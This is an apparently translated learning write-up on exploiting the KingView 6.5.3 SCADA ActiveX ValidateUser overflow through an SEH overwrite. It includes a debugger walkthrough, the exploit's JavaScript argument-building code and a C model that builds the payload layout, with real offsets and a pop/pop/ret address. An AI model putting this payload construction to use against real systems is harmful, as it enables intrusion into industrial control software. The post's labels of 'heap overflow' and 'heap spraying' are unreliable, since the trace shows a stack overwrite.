Exploiting third-party plugins: KingView

Time: 2023-12-28 09:19:14

Category: heap overflow

Description: this exploit targets the vulnerable method call target.ValidateUser(arg1, arg2) in the ActiveX control shipped with KingView 6.5.3 SCADA. A buffer overflow overwrites the SEH record, and a heap spray is then used to get the payload executed.

References: 《Metasploit魔鬼训练营》 (Metasploit Devil Training Camp), pp. 261-269

Metasploit has no module for this, so you can write one yourself from the vulnerability details on exploit-db:

  https://www.exploit-db.com/exploits/16936/

I'm not that familiar with Ruby yet, so I took a shortcut for now: I just dropped the downloaded kingview_SCADA_activeX_validateuser.rb into the exploits/windows/browser directory.

Source download: https://community.rapid7.com/thread/1446#comments

Having read the author's description, it roughly says that the stack-overflow approach did not produce a successful attack, so this code actually uses a heap overflow.

KingView ActiveX exploitation process:

Since an ActiveX control is involved, first relax the ActiveX restrictions in the IE7 browser on the target machine. This is done from the "Tools" menu -> Internet Options -> "Security" tab -> "Custom level". These settings switch off protections, so only do this on the lab target.

After that, running exploit plants meterpreter successfully!

KingView ActiveX vulnerability mechanism analysis:

Use the vulnerability reporter's PoC (Proof of Concept) code as the sample: save it as a local HTML file, start IE from OllyDbg and then open the page. Keep pressing F9 through the intermediate breaks; it finally breaks on this instruction

(The address here differs from the one in the book; I still don't quite understand why the instruction address in the earlier ms06_087 exercise was the same.)

  03C09238    880C02          mov     byte ptr [edx+eax], cl


That is, the instruction raised an exception while writing to 0x00130000.

Alt+M shows the memory map: the write target of the instruction above lies beyond the end of the stack region, which is why the exception is raised.


Now look at the complete code around the faulting instruction (OllyDbg disassembly screenshot in the original post):

It is simply a loop that copies the input into the stack buffer one byte at a time and exits only when it meets a NULL byte; there is no length check at all.

Set a breakpoint at 0x03C09238 in the listing above and restart IE with the vulnerable HTML.

The copy destination starts at 0x0012DB78 and ebp is 0x0012DE58, so the buffer is 0x0012DE58 - 0x0012DB78 = 0x2E0 bytes. The part of the exploit that builds the oversized argument is:

  129    junk1="A";
  130    junk2="A";
  131    while (junk1.length<624){ junk1+=junk1;}   // grow by doubling
  132    junk1=junk1.substring(0,624);              // exactly 624 chars: distance from buffer start to the SEH record
  133    junk2=junk1;
  134    while (junk2.length<8073){ junk2+=junk2;}  // trailing filler
  135    arg2=junk1+nse+seh+nops+shell+junk2;       // nSEH | handler | NOP sled | shellcode | padding
  136    arg1="Anything";
  137    vulnerable.ValidateUser(arg1 ,arg2);       // the vulnerable ActiveX method

The argument is far longer than the buffer and contains no NULL byte, so the copy is guaranteed to overflow. The same rule applies to every piece of the payload: the copy stops at the first 0x00, so nse, seh, the NOP sled and the shellcode must all be NULL-free as well.

Following fs:[0] (the head of the SEH chain) shows that the SEH record (EXCEPTION_REGISTRATION: the next-record pointer followed by the handler pointer) sits on the stack at 0x0012DDE8. That is 0x0012DDE8 - 0x0012DB78 = 0x270 = 624 bytes from the start of the buffer, which is exactly the length of junk1 above.

Pressing F9 now shows the loop writing the same byte "A" (0x41) into memory, one byte per iteration. Rather than stepping through all of that, make the breakpoint conditional so that it only fires when the destination address (edx+eax) reaches the SEH record at 0x0012DDE8:


Press F9 and the loop stops right at the SEH record, where the overwrite begins. From here on the data written is no longer meaningless "A"s: first come 8 deliberately constructed bytes (the nse+seh part of arg2 on line 135 above), then a run of 0x90 (the nops part of arg2), then the shell payload, and finally junk2, i.e. more "A" padding. The post calls the 0x90 run heap spraying; in this trace it is a NOP sled that lands in the overflowed stack buffer itself.

Finally, as described earlier, the stack overflow raises an exception and the program invokes the SE handler, i.e. the handler pointer now sitting on the stack, 0x72D1204E:


Set a breakpoint at 0x72D1204E and press Shift+F9 to pass the exception on to the program.

We land on a pop/pop/ret sequence:


Watching the stack, the third instruction, retn, pops 0x0012DDE8 into eip and execution continues there. That is the address of the SEH record we just overwrote on the stack (the exception dispatcher passes the record's own address to the handler as an argument, and the two pops bring it to the top of the stack):


In other words, the program now runs data (the SEH record) as code!

The slot that should hold the pointer to the next SEH record was overwritten by our overflow with 909006EB, which is the little-endian dword for the bytes EB 06 90 90. The corresponding instructions are jmp short +6 followed by two nops (disassembly screenshot in the original post):

The EB 06 jumps over the four bytes of the handler address and lands on the first 0x90 (nop). Then comes the exciting part, the slide that the post calls heap spraying: the NOP sled carries execution straight into our shellcode, and we are done!
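To pin the numbers in this analysis down, here is an added example that is not part of the original post or of the exploit author's code: a small C model of the frame, built only from the addresses the post recorded in OllyDbg (buffer start 0x0012DB78, ebp 0x0012DE58, SEH record 0x0012DDE8, handler 0x72D1204E). It builds arg2 with the layout of line 135, runs it through a strcpy-style loop like the one at 0x03C09238, checks which bytes land in the SEH record, and works out where the pop/pop/ret and the EB 06 jump transfer control. The byte encoding assumed for nse (EB 06 90 90), the NOP-sled length and the four-byte stand-in shellcode are assumptions; the real exploit string is not shown in the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses recorded in OllyDbg in the post. */
#define BUF_ADDR     0x0012DB78u   /* first byte the copy loop writes              */
#define EBP_ADDR     0x0012DE58u   /* ebp of the vulnerable frame                   */
#define SEH_REC_ADDR 0x0012DDE8u   /* EXCEPTION_REGISTRATION record: nSEH, handler  */
#define PPR_ADDR     0x72D1204Eu   /* pop/pop/ret the handler field is pointed at   */

#define REGION_SIZE  0x300u        /* bytes of stack modelled, starting at BUF_ADDR */

struct frame_model { uint8_t mem[REGION_SIZE]; };   /* mem[i] models BUF_ADDR + i */

size_t offset_to_seh_record(void) { return SEH_REC_ADDR - BUF_ADDR; } /* 0x270 = 624 */
size_t buffer_size(void)          { return EBP_ADDR - BUF_ADDR; }     /* 0x2E0 = 736 */

/* The copy loop stops at the first 0x00, so every address and the shellcode
 * must be NUL-free. */
int has_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) if (p[i] == 0) return 1;
    return 0;
}

/* Build arg2 with the layout of line 135: junk1 | nse | seh | nops | shell | junk2.
 * Returns cap on success, 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap,
                     const uint8_t *shell, size_t shell_len, size_t nop_len)
{
    /* nse: jmp short +6 then two nops; as a dword in memory this reads 909006EB.
     * (Assumed encoding; the post only shows the dword value.) */
    static const uint8_t nse[4] = { 0xEB, 0x06, 0x90, 0x90 };
    const uint8_t seh[4] = {                      /* PPR_ADDR, little-endian */
        (uint8_t)(PPR_ADDR & 0xFF), (uint8_t)((PPR_ADDR >> 8) & 0xFF),
        (uint8_t)((PPR_ADDR >> 16) & 0xFF), (uint8_t)((PPR_ADDR >> 24) & 0xFF) };
    size_t junk1 = offset_to_seh_record();
    size_t n = 0;
    if (cap < junk1 + 8 + nop_len + shell_len) return 0;
    memset(out + n, 'A', junk1);        n += junk1;      /* junk1: reach the record */
    memcpy(out + n, nse, 4);            n += 4;          /* overwrites nSEH         */
    memcpy(out + n, seh, 4);            n += 4;          /* overwrites the handler  */
    memset(out + n, 0x90, nop_len);     n += nop_len;    /* NOP sled                */
    memcpy(out + n, shell, shell_len);  n += shell_len;  /* shellcode               */
    memset(out + n, 'A', cap - n);                       /* junk2: keep copying     */
    return cap;
}

/* Model of the loop at 03C09238: one byte per iteration, no bound, stops only
 * at the first NUL (or at the end of the modelled region). */
size_t vulnerable_copy(struct frame_model *f, const uint8_t *src, size_t src_len)
{
    size_t i = 0;
    memset(f->mem, 0, sizeof f->mem);
    while (i < src_len && i < REGION_SIZE && src[i] != 0) { f->mem[i] = src[i]; i++; }
    return i;
}

static uint32_t rd32(const struct frame_model *f, size_t off)
{
    return (uint32_t)f->mem[off] | (uint32_t)f->mem[off + 1] << 8 |
           (uint32_t)f->mem[off + 2] << 16 | (uint32_t)f->mem[off + 3] << 24;
}
uint32_t model_nseh(const struct frame_model *f)    { return rd32(f, offset_to_seh_record()); }
uint32_t model_handler(const struct frame_model *f) { return rd32(f, offset_to_seh_record() + 4); }

/* After the fault the dispatcher calls the handler (pop/pop/ret); ret pops the
 * address of the record itself, so execution resumes at nSEH. */
uint32_t ppr_return_target(void) { return SEH_REC_ADDR; }
/* EB 06 at nSEH: target = next instruction (+2) + 6 = the first NOP. */
uint32_t short_jump_target(uint32_t at_nseh) { return at_nseh + 2 + 0x06; }

int main(void)
{
    static uint8_t payload[0x400];
    static const uint8_t shell[] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* constructed stand-in, not a real payload */
    struct frame_model f;
    size_t n = build_payload(payload, sizeof payload, shell, sizeof shell, 16);
    size_t copied = vulnerable_copy(&f, payload, n);
    printf("buffer 0x%zX bytes, SEH record at +0x%zX, NUL-free=%d, copied %zu bytes\n",
           buffer_size(), offset_to_seh_record(), !has_nul(payload, n), copied);
    printf("nSEH=%08X handler=%08X -> ret to %08X -> jmp to %08X\n",
           model_nseh(&f), model_handler(&f), ppr_return_target(),
           short_jump_target(ppr_return_target()));
    return 0;
}
```

The model is only as good as the addresses fed into it: on a different IE or KingView build the buffer and record move together, so the 624-byte distance is the value to re-measure first, and has_nul() is the check to run on any replacement pop/pop/ret address before using it.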

Summary: this deepened my understanding of the stack and heap. Since my Oracle vulnerability analysis last time did not work out, it was only through this experiment that I came to understand the SEH-overwrite exploitation method; its special feature is making the program execute data as code. Beyond that, I learned to use conditional breakpoints and the trick of using Shift+F7/F8/F9 to pass exceptions. It took about two days, which is still a bit slow.

I also feel my big-picture view is still not great; I easily get lost in the details, but that is understandable since I am only just getting started. Next time I could try splitting the debugging process into clear steps and then pulling them together for a final review.